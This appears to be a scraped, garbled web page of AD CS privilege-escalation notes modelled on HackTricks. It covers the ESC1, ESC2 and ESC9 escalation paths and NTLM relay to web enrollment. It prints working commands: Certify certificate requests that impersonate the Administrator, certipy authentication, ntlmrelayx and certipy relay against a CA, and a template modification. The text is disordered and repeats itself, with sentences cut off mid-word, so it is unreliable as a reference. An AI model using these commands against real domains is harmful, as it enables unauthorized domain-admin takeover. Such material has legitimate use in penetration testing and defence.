Hacktricks Adcs High Quality May 2026

# Request a certificate for a domain admin (using Certify) Certify.exe request /ca:dc.contoso.local\CONTOSO-CA /template:UserSAN /altname:Administrator certipy auth -pfx administrator.pfx -domain contoso.local

# Using PowerMad (Set-PKITemplate -Identity VulnTemplate -EnrolleeSuppliesSubject $true -AddEKUs @("Client Authentication")) Condition : CA is configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag. (Allows any requester to specify SAN.) hacktricks adcs

# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController # Request a certificate for a domain admin

: Obtain a certificate for the relayed account (e.g., a computer account, domain admin). ESC9 – No Security Extension in Template Condition : Certificate template has CT_FLAG_NO_SECURITY_EXTENSION , which bypasses permissions on the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT . : Modify template to enable ESC1 conditions (e

: Modify template to enable ESC1 conditions (e.g., allow SAN supply), then request as ESC1.

Certify.exe request /ca:DC.CONTOSO.LOCAL\CONTOSO-CA /template:User /altname:Administrator Condition : ADCS web enrollment interfaces ( /certsrv/ , /CertSrv/ , /certsrv/mscep/ ) are enabled and not configured with extended protection or HTTPS.

: Immediate domain admin access via Kerberos authentication. ESC2 – Certificate Template Allows Any EKU Condition : Template defines Any Purpose EKU (2.5.29.37.0) and allows low-priv enrollment.